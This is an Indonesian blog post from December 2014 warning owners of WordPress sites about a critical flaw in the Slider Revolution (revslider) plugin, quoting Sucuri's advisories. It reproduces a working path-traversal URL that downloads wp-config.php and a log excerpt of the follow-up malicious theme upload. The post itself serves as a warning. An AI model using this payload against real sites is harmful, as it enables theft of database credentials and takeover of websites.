Month: December 2014

Malam Tahun Baru: Eh Malah Benerin Website Kena Hack :/

Posted on Updated on

Yang pada punya website yg pake WordPress terus pake themes2 berbayar yang menggunakan plugin slider revolution atau revslider, hati2 itu ada bug yg lumayan crucial yg bisa bikin attacker bisa cari jalan masuk untuk ngacak2 web blog elu.

The proof of concept shared via underground sites shows how someone can easily download the wp-config.php:

http://victim.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

This is used to steal the database credentials, which then allows you to compromise the website via the database.

more: http://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html

Exploit:If the discovery phase is successful and they find a site using Revslider, they use a second vulnerability in Revslider and attempt to upload a malicious theme to the site:

94.153.8.126 – – [14/Dec/2014:04:31:28 -0500] “POST /wp-admin/admin-ajax.php HTTP/1.1″ 200 4183 “-”
Content-Disposition: form-data; revslider_ajax_action
update_plugin; name=”update_file”;…

more: http://blog.sucuri.net/2014/12/revslider-vulnerability-leads-to-massive-wordpress-soaksoak-compromise.html

Ayo coba sana di cek blog2 wordpress nya, siapa tau salah satu themes yg dipake ada yang pake plugin ini ;))

Advertisements